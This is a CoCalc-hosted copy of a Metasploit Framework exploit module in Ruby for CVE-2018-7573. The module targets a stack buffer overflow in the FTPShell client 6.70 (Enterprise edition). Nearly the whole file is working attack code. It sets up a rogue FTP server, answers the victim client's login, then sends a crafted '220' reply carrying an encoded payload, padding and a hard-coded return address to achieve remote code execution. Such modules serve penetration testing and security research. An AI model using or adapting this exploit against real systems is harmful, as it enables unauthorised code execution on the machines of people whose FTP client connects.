CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise

16
          edition) allowing remote code execution.

17
        },

18
      'Author'   =>

19
        [

20
          'r4wd3r',           # Original exploit author

21
          'Daniel Teixeira'   # MSF module author

22
        ],

23
      'License'        => MSF_LICENSE,

24
      'References'     =>

25
        [

26
          [ 'CVE', '2018-7573'],

27
          [ 'EDB', '44596' ]

28
        ],

29
      'Payload'        =>

30
        {

31
          'Space'    => 400,

32
          'BadChars' => "\x00\x22\x0d\x0a\x0b"

33
        },

34
      'Platform'       => 'win',

35
      'Targets'        =>

36
        [

37
          # CALL ESI in FTPShell.exe : 0x00452eed

38
          [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ]

39
        ],

40
      'Privileged'     => false,

41
      'DefaultOptions' =>

42
        {

43
          'SRVHOST' => '0.0.0.0',

44
          'EXITFUNC' => 'thread'

45
        },

46
      'DisclosureDate' => '2017-03-04',

47
      'DefaultTarget'  => 0))

48


49
    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]

50
  end

51


52
  def exploit

53
    srv_ip_for_client = datastore['SRVHOST']

54
    if srv_ip_for_client == '0.0.0.0'

55
      if datastore['LHOST']

56
        srv_ip_for_client = datastore['LHOST']

57
      else

58
        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')

59
      end

60
    end

61


62
    srv_port = datastore['SRVPORT']

63


64
    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")

65
    super

66
  end

67


68
  def on_client_connect(client)

69
    p = regenerate_payload(client)

70
    return if p.nil?

71
    print_status("#{client.peerhost} - connected.")

72


73
    res = client.get_once.to_s.strip

74
    print_status("#{client.peerhost} - Request: #{res}") unless res.empty?

75
    print_status("#{client.peerhost} - Response: Sending 220 Welcome")

76
    welcome = "220 Welcome.\r\n"

77
    client.put(welcome)

78


79
    res = client.get_once.to_s.strip

80
    print_status("#{client.peerhost} - Request: #{res}")

81
    print_status("#{client.peerhost} - Response: sending 331 OK")

82
    user = "331 OK.\r\n"

83
    client.put(user)

84


85
    res = client.get_once.to_s.strip

86
    print_status("#{client.peerhost} - Request: #{res}")

87
    print_status("#{client.peerhost} - Response: Sending 230 OK")

88
    pass = "230 OK.\r\n"

89
    client.put(pass)

90
    res = client.get_once.to_s.strip

91
    print_status("#{client.peerhost} - Request: #{res}")

92


93
    sploit = '220 "'

94
    sploit << payload.encoded

95
    sploit << "\x20" * (payload_space - payload.encoded.length)

96
    sploit << target.ret

97
    sploit << "\" is current directory\r\n"

98


99
    print_status("#{client.peerhost} - Request: Sending the malicious response")

100
    client.put(sploit)

101


102
  end

103
end

104


105